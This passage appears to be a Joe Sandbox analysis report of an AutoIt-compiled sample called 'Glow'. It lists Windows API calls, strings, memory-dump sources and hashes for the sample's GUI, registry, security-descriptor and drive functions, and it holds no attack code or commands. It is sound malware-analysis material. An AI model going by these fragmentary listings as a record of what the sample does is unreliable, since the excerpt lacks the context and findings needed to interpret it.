                                                                                                                                                                          • SetErrorMode.KERNEL32(00000000,0041DC30,?,\\.\,0041DCD0), ref: 003F577B
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ErrorMode$DriveType
                                                                                                                                                                          • String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
                                                                                                                                                                          • API String ID: 2907320926-4222207086
                                                                                                                                                                          • Opcode ID: 8b837652b83ade8c5abe1f15142691b568f77a2f9b52b61d71b6b028ad37a853
                                                                                                                                                                          • Instruction ID: b58a12687665c9ea607e50b1b35471f2fdd9355ee62e39774be37137214f60b5
                                                                                                                                                                          • Opcode Fuzzy Hash: 8b837652b83ade8c5abe1f15142691b568f77a2f9b52b61d71b6b028ad37a853
                                                                                                                                                                          • Instruction Fuzzy Hash: DB610570A04A0DDFD726EF24C991979B3A5EF14350B348066E706EF691C735DD06CB85
                                                                                                                                                                          APIs
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 003825F8
                                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 00382600
                                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0038262B
                                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 00382633
                                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 00382658
                                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00382675
                                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00382685
                                                                                                                                                                          • CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 003826B8
                                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 003826CC
                                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 003826EA
                                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 00382706
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 00382711
                                                                                                                                                                            • Part of subcall function 003819CD: GetCursorPos.USER32(?), ref: 003819E1
                                                                                                                                                                            • Part of subcall function 003819CD: ScreenToClient.USER32(00000000,?), ref: 003819FE
                                                                                                                                                                            • Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000001), ref: 00381A23
                                                                                                                                                                            • Part of subcall function 003819CD: GetAsyncKeyState.USER32(00000002), ref: 00381A3D
                                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,0038199C), ref: 00382738
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                                          • String ID: <)E$<)E$AutoIt v3 GUI$(E$(E$(E
                                                                                                                                                                          • API String ID: 1458621304-2898306966
                                                                                                                                                                          • Opcode ID: 5eecf5283ab24fc11a6cce70a1fcfffc65799904c8b9f8ff676fd4d9829245b2
                                                                                                                                                                          • Instruction ID: 67777f1b640df81f09a799b96252eb695632b544f848be3d28837f419510f3e9
                                                                                                                                                                          • Opcode Fuzzy Hash: 5eecf5283ab24fc11a6cce70a1fcfffc65799904c8b9f8ff676fd4d9829245b2
                                                                                                                                                                          • Instruction Fuzzy Hash: 58B17BB1A00209AFCB15DFA8CD45BEE7BB5FB48314F11822AFA15EB290D774D940CB54
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00411BC4
                                                                                                                                                                          • GetDesktopWindow.USER32 ref: 00411BD9
                                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 00411BE0
                                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00411C35
                                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00411C55
                                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 00411C89
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00411CA7
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00411CB9
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000421,?,?), ref: 00411CCE
                                                                                                                                                                          • SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 00411CE1
                                                                                                                                                                          • IsWindowVisible.USER32(00000000), ref: 00411D3D
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 00411D58
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 00411D6C
                                                                                                                                                                          • GetWindowRect.USER32(00000000,?), ref: 00411D84
                                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00411DAA
                                                                                                                                                                          • GetMonitorInfoW.USER32(00000000,?), ref: 00411DC4
                                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00411DDB
                                                                                                                                                                          • SendMessageW.USER32(00000000,00000412,00000000), ref: 00411E46
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                                          • Opcode ID: 440a1b6f5bf367a57969ae48378525e63f96260f0c13d74f4c61ef7ddbcff74e
                                                                                                                                                                          • Instruction ID: ca52f396b22e4b439d136764a7d17e11782275d83bd2b254367da365b8980444
                                                                                                                                                                          • Opcode Fuzzy Hash: 440a1b6f5bf367a57969ae48378525e63f96260f0c13d74f4c61ef7ddbcff74e
                                                                                                                                                                          • Instruction Fuzzy Hash: C5B19B71604301AFD714DF64C984BABBBE5FF84310F00891DFA999B2A1D735E885CBA6
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00410D81
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00410DBB
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00410E25
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00410E8D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00410F11
                                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00410F61
                                                                                                                                                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00410FA0
                                                                                                                                                                            • Part of subcall function 0039FD52: _wcslen.LIBCMT ref: 0039FD5D
                                                                                                                                                                            • Part of subcall function 003E2B8C: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 003E2BA5
                                                                                                                                                                            • Part of subcall function 003E2B8C: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 003E2BD7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                                          • API String ID: 1103490817-719923060
                                                                                                                                                                          • Opcode ID: 69a80ef4079a639d5d7893019e8319a1155368b23405317b65e29a6610ee262b
                                                                                                                                                                          • Instruction ID: 0533e0a1aeeb5ffcfd1e3bdef9868bd28fa4a952126a22d6224fea824711aef8
                                                                                                                                                                          • Opcode Fuzzy Hash: 69a80ef4079a639d5d7893019e8319a1155368b23405317b65e29a6610ee262b
                                                                                                                                                                          • Instruction Fuzzy Hash: 38E1F1312043418FC714EF24C9418ABB3E6FF88314B10896EF4969B7A1DB78ED86CB56
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 003E1A60
                                                                                                                                                                            • Part of subcall function 003E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A6C
                                                                                                                                                                            • Part of subcall function 003E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A7B
                                                                                                                                                                            • Part of subcall function 003E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,003E14E7,?,?,?), ref: 003E1A82
                                                                                                                                                                            • Part of subcall function 003E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 003E1A99
                                                                                                                                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 003E1741
                                                                                                                                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 003E1775
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 003E178C
                                                                                                                                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 003E17C6
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003E17E2
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?), ref: 003E17F9
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000008,00000008), ref: 003E1801
                                                                                                                                                                          • HeapAlloc.KERNEL32(00000000), ref: 003E1808
                                                                                                                                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 003E1829
                                                                                                                                                                          • CopySid.ADVAPI32(00000000), ref: 003E1830
                                                                                                                                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 003E185F
                                                                                                                                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 003E1881
                                                                                                                                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 003E1893
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E18BA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E18C1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E18CA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E18D1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,00000000), ref: 003E18DA
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E18E1
                                                                                                                                                                          • GetProcessHeap.KERNEL32(00000000,?), ref: 003E18ED
                                                                                                                                                                          • HeapFree.KERNEL32(00000000), ref: 003E18F4
                                                                                                                                                                            • Part of subcall function 003E1ADF: GetProcessHeap.KERNEL32(00000008,003E14FD,?,00000000,?,003E14FD,?), ref: 003E1AED
                                                                                                                                                                            • Part of subcall function 003E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,003E14FD,?), ref: 003E1AF4
                                                                                                                                                                            • Part of subcall function 003E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,003E14FD,?), ref: 003E1B03
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 4175595110-0
                                                                                                                                                                          • Opcode ID: 746a896caf3a46161b86d2a5675048938a02be27c2b033d3553f957a50a4db91
                                                                                                                                                                          • Instruction ID: 3c2ea43603f423069a961a518436c949ce3b96ef4024d320931693bea99bc51f
                                                                                                                                                                          • Opcode Fuzzy Hash: 746a896caf3a46161b86d2a5675048938a02be27c2b033d3553f957a50a4db91
                                                                                                                                                                          • Instruction Fuzzy Hash: 09715AB2D00269AFDF11DFA6DC44FEEBBB8BF08740F158225F915A6190D7309A05CB60
                                                                                                                                                                          APIs
                                                                                                                                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0040CF1D
                                                                                                                                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,0041DCD0,00000000,?,00000000,?,?), ref: 0040CFA4
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000,00000000,00000000), ref: 0040D004
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040D054
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0040D0CF
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000001,?,?), ref: 0040D112
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000007,?,?), ref: 0040D221
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,0000000B,?,00000008), ref: 0040D2AD
                                                                                                                                                                          • RegCloseKey.ADVAPI32(?), ref: 0040D2E1
                                                                                                                                                                          • RegCloseKey.ADVAPI32(00000000), ref: 0040D2EE
                                                                                                                                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000003,00000000,00000000), ref: 0040D3C0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Value$Close$_wcslen$ConnectCreateRegistry
                                                                                                                                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                                                                                                                                          • API String ID: 9721498-966354055
                                                                                                                                                                          • Opcode ID: 5bdb548d324bb1e4f5b5b6a38e1ac7e1788e169cc445e7d7ae6be2f2cc562473
                                                                                                                                                                          • Instruction ID: 85e432b2b0b85c4160b56000d98259cfc6e9211d76111be4a6c811005c75992c
                                                                                                                                                                          • Opcode Fuzzy Hash: 5bdb548d324bb1e4f5b5b6a38e1ac7e1788e169cc445e7d7ae6be2f2cc562473
                                                                                                                                                                          • Instruction Fuzzy Hash: 661258356043019FD715EF14C881A2AB7E6EF88714F1488ADF94AAB3A2CB35FD45CB85
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00411462
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041149D
                                                                                                                                                                          • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 004114F0
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00411526
                                                                                                                                                                          • _wcslen.LIBCMT ref: 004115A2
                                                                                                                                                                          • _wcslen.LIBCMT ref: 0041161D
                                                                                                                                                                            • Part of subcall function 0039FD52: _wcslen.LIBCMT ref: 0039FD5D
                                                                                                                                                                            • Part of subcall function 003E3535: SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 003E3547
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                                                                                                          • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                                                                                                          • API String ID: 1103490817-4258414348
                                                                                                                                                                          • Opcode ID: 9537656b864f5b35d4386d1c2b68f735b0e0df9fd0095e865e234afab6f9128a
                                                                                                                                                                          • Instruction ID: d7973391ab73e227611d8ae6a91df1a5f9b318b5a7326c030f1d0542243ff75b
                                                                                                                                                                          • Opcode Fuzzy Hash: 9537656b864f5b35d4386d1c2b68f735b0e0df9fd0095e865e234afab6f9128a
                                                                                                                                                                          • Instruction Fuzzy Hash: CFE1C2316043419FCB01EF24C4509AAB7E2FF94314F14895EF9969B3A2DB35ED85CB85
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _wcslen$BuffCharUpper
                                                                                                                                                                          • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                                                                                                          • API String ID: 1256254125-909552448
                                                                                                                                                                          • Opcode ID: 90617ef7c12fd8903eb9900ce7d1e6e57220a407608acf52c30de6169aef916e
                                                                                                                                                                          • Instruction ID: c80aaf5a1891fbc93b62fb4defcf5bccb5f3f90f66664f1edf51db0c6b3bb8c9
                                                                                                                                                                          • Opcode Fuzzy Hash: 90617ef7c12fd8903eb9900ce7d1e6e57220a407608acf52c30de6169aef916e
                                                                                                                                                                          • Instruction Fuzzy Hash: 8471C432E001269BCB109EB8CD505BF33A1AF61764B21053AEC56BB3D4EA3DDD4D8398
                                                                                                                                                                          APIs
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00418DB5
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00418DC9
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00418DEC
                                                                                                                                                                          • _wcslen.LIBCMT ref: 00418E0F
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 00418E4D
                                                                                                                                                                          • LoadLibraryExW.KERNEL32(?,00000000,00000032,00000000,?,?,?,?,?,00416691), ref: 00418EA9
                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00418EE2
                                                                                                                                                                          • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 00418F25
                                                                                                                                                                          • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00418F5C
                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 00418F68
                                                                                                                                                                          • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00418F78
                                                                                                                                                                          • DestroyIcon.USER32(?,?,?,?,?,00416691), ref: 00418F87
                                                                                                                                                                          • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00418FA4
                                                                                                                                                                          • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00418FB0
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                                                                                                          • String ID: .dll$.exe$.icl
                                                                                                                                                                          • API String ID: 799131459-1154884017
                                                                                                                                                                          • Opcode ID: 91ed733537ae0d7fbcd15cd61a5de465699a2572e5391a5ffcc3372b055cda2d
                                                                                                                                                                          • Instruction ID: 3ebe1b0d0e2e79aa4efd94dc00acf685adee68ed692abd5a573863193648506d
                                                                                                                                                                          • Opcode Fuzzy Hash: 91ed733537ae0d7fbcd15cd61a5de465699a2572e5391a5ffcc3372b055cda2d
                                                                                                                                                                          • Instruction Fuzzy Hash: BA61C071900219BAEB14DF64CC45BFF77A8FF08B10F10811AF915DA1D1DBB8A991CBA4
                                                                                                                                                                          APIs
                                                                                                                                                                          • CharLowerBuffW.USER32(?,?), ref: 003F493D
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F4948
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F499F
                                                                                                                                                                          • _wcslen.LIBCMT ref: 003F49DD
                                                                                                                                                                          • GetDriveTypeW.KERNEL32(?), ref: 003F4A1B
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F4A63
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F4A9E
                                                                                                                                                                          • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 003F4ACC
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 0000000A.00000002.2492249726.0000000000381000.00000020.00000001.01000000.00000006.sdmp, Offset: 00380000, based on PE: true
                                                                                                                                                                          • Associated: 0000000A.00000002.2492230466.0000000000380000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.000000000041D000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492297684.0000000000443000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492339721.000000000044D000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          • Associated: 0000000A.00000002.2492356359.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_10_2_380000_Glow.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: SendString_wcslen$BuffCharDriveLowerType
                                                                                                                                                                          • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                                                                                                          • API String ID: 1839972693-4113822522
                                                                                                                                                                          • Opcode ID: f4032bd3a1befc7a8ef216f951070f520b50982d7302b54cf85e35bdd70444da
                                                                                                                                                                          • Instruction ID: b74da72448d9400b2aa1eb58a2f9a92c4aeed8840e069a8d62e0aa10b8080d74
                                                                                                                                                                          • Opcode Fuzzy Hash: f4032bd3a1befc7a8ef216f951070f520b50982d7302b54cf85e35bdd70444da
                                                                                                                                                                          • Instruction Fuzzy Hash: 6271F2326083069FC702EF24C88097BB7E4EF94768F50496DF99697262EB30DD46CB91
                                                                                                                                                                          APIs
                                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 003E6395
                                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 003E63A7
                                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 003E63BE
